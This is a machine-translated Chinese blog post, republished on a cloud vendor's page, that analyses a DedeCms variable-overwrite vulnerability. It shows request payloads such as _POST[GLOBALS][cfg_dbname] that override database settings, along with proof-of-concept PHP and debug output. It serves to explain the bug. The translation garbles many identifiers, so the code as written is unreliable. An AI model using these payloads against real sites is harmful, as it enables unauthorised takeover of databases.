Why does the DedeCms vulnerability overwrite database configuration variables?

Last Update:2013-11-20 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

This case is quite embarrassing. We found that Dedecms had such a serious problem. It is also rumored that dede does not need to be logged into the background.

On the Internet, I also got an analysis from mr_xhming:

Http://hi.baidu.com/mr_xhming/blog/item/5e6d6009d44b1f39e92488a5.html

There are comments from Daniel

| Reply

Overwrite the common. inc. php file

$ GLOBALS ['cfg _ dbhost'];
$ GLOBALS ['cfg _ dbuser'];
$ GLOBALS ['cfg _ dbpwd'];
$ GLOBALS ['cfg _ dbname'];
$ GLOBALS ['cfg _ dbprefix'];

Then initialize the database class.

// Introduce the Database Class
Require_once (DEDEINC. '/dedesql. class. php ');
// Global common functions
Require_once (DEDEINC. '/common. func. php ');
?>

At that time, I was wondering why the DedeCms variable overwrite vulnerability could overwrite database configuration variables? Because overwrite (or create) is in the front, and the value is in the back.

// Include/common. inc. php

Function _ RunMagicQuotes (& $ svar)
{
If (! Get_magic_quotes_gpc ())
{
If (is_array ($ svar ))
{
Foreach ($ svar as $ _ k = >$ _ v) $ svar [$ _ k] = _ RunMagicQuotes ($ _ v );
}
Else
{
$ Svar = addslashes ($ svar );
}
}
Return $ svar;
}

If (! Defined ('derequest ')) { // Check and register external submitted Variables Foreach ($ _ REQUEST as $ _ k => $ _ v) { If (strlen ($ _ k)> 0 & preg_match ('/^ (cfg _ | GLOBALS)/', $ _ k )) { Exit ('request var not allow! '); } } Foreach (Array ('_ get',' _ Post', '_ COOKIE') as $ _ request) { Foreach ($ _ request as $ _ k = >$ _ v) $ {$ _ k} = _ RunMagicQuotes ($ _ v );// Overwrite the variable here } }

// System variable Detection
If (! Isset ($ needFilter ))
{
$ NeedFilter = false;
}
$ RegisterGlobals = @ ini_get ("register_globals ");
$ IsUrlOpen = @ ini_get ("allow_url_fopen ");
$ IsSafeMode = @ ini_get ("safe_mode ");
If (preg_match ('/windows/I', @ getenv ('OS ')))
{
$ IsSafeMode = false;
}

// Session save path
$ SessSavePath = DEDEDATA. "/sessions /";
If (is_writeable ($ sessSavePath) & is_readable ($ sessSavePath ))
{
Session_save_path ($ sessSavePath );
}

// System configuration parameters
Require_once (DEDEDATA. "/config. cache. inc. php ");

// Convert the variables related to the uploaded files and perform security processing, and reference the common upload functions at the front end.
If ($ _ FILES)
{
Require_once (DEDEINC. '/uploadsafe. inc. php ');
}

// Database Configuration File
Require_once (DEDEDATA. '/common. inc. php'); // introduce the database configuration file here
...

// Data/content in common. inc. php

<? Php
// Database connection information
$ Pai_dbhost = 'localhost ';
$ Pai_dbname = 'de2 ′;
$ User_dbuser = 'root ';
$ Pai_dbpwd = ";
$ Inclu_dbprefix = 'dede _';
$ Pai_db_language = 'utf8 ′;

It seems that even if the $ mongo_dbname variables are overwritten, the value of $ mongo_dbname is assigned in the subsequent articles.

Then I thought that only those system variables that were not initialized before overwriting could be used for overwriting. However, I used this vulnerability in other ways and I was lucky enough to get a shell. At that time, I did not understand the comments of the fly bull. (This vulnerability was announced in !) At that time, the Dedecms variable overwrites the $ _ FILE array. In fact, in addition to this, it is more serious. Many people have discovered it, but no one has revealed it, because it is useless. But the Dedecms guys only know the repair and makeup, and when the variable overwrite is completed, nothing is obvious next to it. Now that they have completed the vulnerability, they still haven't completed some serious problems.

There are a lot of things, and the key issues have not been solved yet. Variable overwrite exists, but you still don't know how to use it.

The root cause is:$ Cfg _dbname and $ GLOBALS ['cfg _ dbname'] Are they the same thing?
I thought it was one thing, but it was actually not that.

We can make an experiment:

Add several lines of code to include/common. inc. php:

Echo '------------------------------------------------------- '; Echo '$ GLOBALS [mongo_dbname]:'; Var_dump ($ GLOBALS [mongo_dbname]); Echo '------------------------------------------------------- '; Echo '$ response _dbname '; Var_dump ($ pai_dbname ); // Database Configuration File Echo '++ ++ '; Require_once (DEDEDATA. '/common. inc. php '); Echo '------------------------------------------------------- '; Echo '$ GLOBALS [mongo_dbname]:'; Var_dump ($ GLOBALS [mongo_dbname]); Echo '------------------------------------------------------- '; Echo '$ response _dbname '; Var_dump ($ pai_dbname ); Exit;

Submit http://www.bkjia.com/de2/index. php? _ POST [mongo_dbname] = 1234

The result is as follows:

---------------------------------------------------------$GLOBALS[cfg_dbname]:string '1234' (length=4)---------------------------------------------------------$cfg_dbnamestring '1234' (length=4)++++++++++++++++++++++++++++++++++++++++++++++++++++++++---------------------------------------------------------$GLOBALS[cfg_dbname]:string 'de2' (length=3)---------------------------------------------------------$cfg_dbnamestring 'de2' (length=3)

Submit: http: // 127.0.0.1/de2/index. php? _ POST[GLOBALS][Pai_dbname] = 1234

---------------------------------------------------------$GLOBALS[cfg_dbname]:string '1234' (length=4)---------------------------------------------------------$cfg_dbnamenull++++++++++++++++++++++++++++++++++++++++++++++++++++++++---------------------------------------------------------$GLOBALS[cfg_dbname]:string '1234' (length=4)---------------------------------------------------------$cfg_dbnamestring 'de2' (length=3)

Now we can find the desired result, because the database class introduced later

if ($GLOBALS['cfg_mysql_type'] == 'mysqli' && function_exists("mysqli_init")){ require_once(DEDEINC.'/dedesqli.class.php');} else { require_once(DEDEINC.'/dedesql.class.php');}

The initialization function is like this. The value is assigned using the $ GLOBALS ['cfg _ dbname'] variable.

function Init($pconnect=FALSE){$this->linkID = 0;$this->queryString = '';$this->parameters = Array();$this->dbHost   =  $GLOBALS['cfg_dbhost'];$this->dbUser   =  $GLOBALS['cfg_dbuser'];$this->dbPwd    =  $GLOBALS['cfg_dbpwd'];$this->dbName   =  $GLOBALS['cfg_dbname'];$this->dbPrefix =  $GLOBALS['cfg_dbprefix'];$this->result["me"] = 0;$this->Open($pconnect);}

Therefore, it can be overwritten, because $ GLOBALS ['cfg _ dbname'] is not equivalent to $ cfg_dbname. I originally thought it was equivalent.

That is to say, assign a value to $ GLOBALS ['cfg _ dbname'] And then $ cfg _dbname.

$ GLOBALS ['cfg _ dbname'] is not equal to the value of $ cfg _dbname

The database configuration file of Dedecms uses the $ GLOBALS ['cfg _ dbname'] variable.

After the foreach loop overwrites $ GLOBALS, $ GLOBALS is no longer a super global variable, and it becomes a common array, therefore, $ GLOBALS ['cfg _ dbname'] is no longer equivalent to $ resolve _dbname, which is the key to the problem.
The proof code is as follows:

< ?php$_POST['GLOBALS']['cfg_dbname'] = '123';var_dump($GLOBALS);foreach($_POST as $k => $v){$$k=$v;}echo '~~~~~~~~~~~~~~~~~~~~~~';echo $cfg_dbname.':'.$GLOBALS['cfg_dbname'];echo '+++++++++++++++++++++++';var_dump($GLOBALS);$cfg_dbname = '456';echo '-----------------------';echo $cfg_dbname.':'.$GLOBALS['cfg_dbname'];?>

The result is as follows:

array  'GLOBALS' =>    &array  'HTTP_HOST' => string '127.1' (length=5)  'HTTP_USER_AGENT' => string 'Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20' (length=90)  'HTTP_ACCEPT' => string 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' (length=63)  'HTTP_ACCEPT_LANGUAGE' => string 'zh-cn,zh;q=0.5' (length=14)  'HTTP_ACCEPT_ENCODING' => string 'gzip,deflate' (length=12)  'HTTP_ACCEPT_CHARSET' => string 'GB2312,utf-8;q=0.7,*;q=0.7' (length=26)  'HTTP_KEEP_ALIVE' => string '115' (length=3)  'HTTP_CONNECTION' => string 'keep-alive' (length=10)  'PATH' => string 'C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\ThinkPad\Bluetooth Software\;C:\Program Files\ThinkPad\Bluetooth Software\syswow64;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Common Files\Lenovo;C:\Program Files (x86)\Common Files\Ulead Systems\MPEG;C:\'... (length=975)  'SystemRoot' => string 'C:\Windows' (length=10)  'COMSPEC' => string 'C:\Windows\system32\cmd.exe' (length=27)  'PATHEXT' => string '.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC' (length=53)  'WINDIR' => string 'C:\Windows' (length=10)  'SERVER_SIGNATURE' => string '' (length=0)  'SERVER_SOFTWARE' => string 'Apache/2.2.17 (Win32) PHP/5.3.5' (length=31)  'SERVER_NAME' => string '127.1' (length=5)  'SERVER_ADDR' => string '127.0.0.1' (length=9)  'SERVER_PORT' => string '80' (length=2)  'REMOTE_HOST' => string 'web9.vghtpe.gov.tw' (length=18)  'REMOTE_ADDR' => string '127.0.0.1' (length=9)  'DOCUMENT_ROOT' => string 'C:/wamp/www/' (length=12)  'SERVER_ADMIN' => string 'admin@localhost' (length=15)  'SCRIPT_FILENAME' => string 'C:/wamp/www/5.php' (length=17)  'REMOTE_PORT' => string '53482' (length=5)  'GATEWAY_INTERFACE' => string 'CGI/1.1' (length=7)  'SERVER_PROTOCOL' => string 'HTTP/1.1' (length=8)  'REQUEST_METHOD' => string 'GET' (length=3)  'QUERY_STRING' => string '' (length=0)  'REQUEST_URI' => string '/5.php' (length=6)  'SCRIPT_NAME' => string '/5.php' (length=6)  'PHP_SELF' => string '/5.php' (length=6)  'REQUEST_TIME' => int 1314794715  '_POST' =>    array      'GLOBALS' =>        array          'cfg_dbname' => string '123' (length=3)  '_GET' =>    array      empty  '_COOKIE' =>    array      empty  '_SERVER' =>    array      'HTTP_HOST' => string '127.1' (length=5)      'HTTP_USER_AGENT' => string 'Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20' (length=90)      'HTTP_ACCEPT' => string 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' (length=63)      'HTTP_ACCEPT_LANGUAGE' => string 'zh-cn,zh;q=0.5' (length=14)      'HTTP_ACCEPT_ENCODING' => string 'gzip,deflate' (length=12)      'HTTP_ACCEPT_CHARSET' => string 'GB2312,utf-8;q=0.7,*;q=0.7' (length=26)      'HTTP_KEEP_ALIVE' => string '115' (length=3)      'HTTP_CONNECTION' => string 'keep-alive' (length=10)      'PATH' => string 'C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\ThinkPad\Bluetooth Software\;C:\Program Files\ThinkPad\Bluetooth Software\syswow64;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Common Files\Lenovo;C:\Program Files (x86)\Common Files\Ulead Systems\MPEG;C:\'... (length=975)      'SystemRoot' => string 'C:\Windows' (length=10)      'COMSPEC' => string 'C:\Windows\system32\cmd.exe' (length=27)      'PATHEXT' => string '.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC' (length=53)      'WINDIR' => string 'C:\Windows' (length=10)      'SERVER_SIGNATURE' => string '' (length=0)      'SERVER_SOFTWARE' => string 'Apache/2.2.17 (Win32) PHP/5.3.5' (length=31)      'SERVER_NAME' => string '127.1' (length=5)      'SERVER_ADDR' => string '127.0.0.1' (length=9)      'SERVER_PORT' => string '80' (length=2)      'REMOTE_HOST' => string 'web9.vghtpe.gov.tw' (length=18)      'REMOTE_ADDR' => string '127.0.0.1' (length=9)      'DOCUMENT_ROOT' => string 'C:/wamp/www/' (length=12)      'SERVER_ADMIN' => string 'admin@localhost' (length=15)      'SCRIPT_FILENAME' => string 'C:/wamp/www/5.php' (length=17)      'REMOTE_PORT' => string '53482' (length=5)      'GATEWAY_INTERFACE' => string 'CGI/1.1' (length=7)      'SERVER_PROTOCOL' => string 'HTTP/1.1' (length=8)      'REQUEST_METHOD' => string 'GET' (length=3)      'QUERY_STRING' => string '' (length=0)      'REQUEST_URI' => string '/5.php' (length=6)      'SCRIPT_NAME' => string '/5.php' (length=6)      'PHP_SELF' => string '/5.php' (length=6)      'REQUEST_TIME' => int 1314794715  '_ENV' =>    array      empty  '_FILES' =>    array      empty  '_REQUEST' =>    array      empty~~~~~~~~~~~~~~~~~~~~~~:123+++++++++++++++++++++++array  'cfg_dbname' => string '123' (length=3)-----------------------456:123from：0x50sec.org

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

Why does the DedeCms vulnerability overwrite database configuration variables?

Contact Us

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support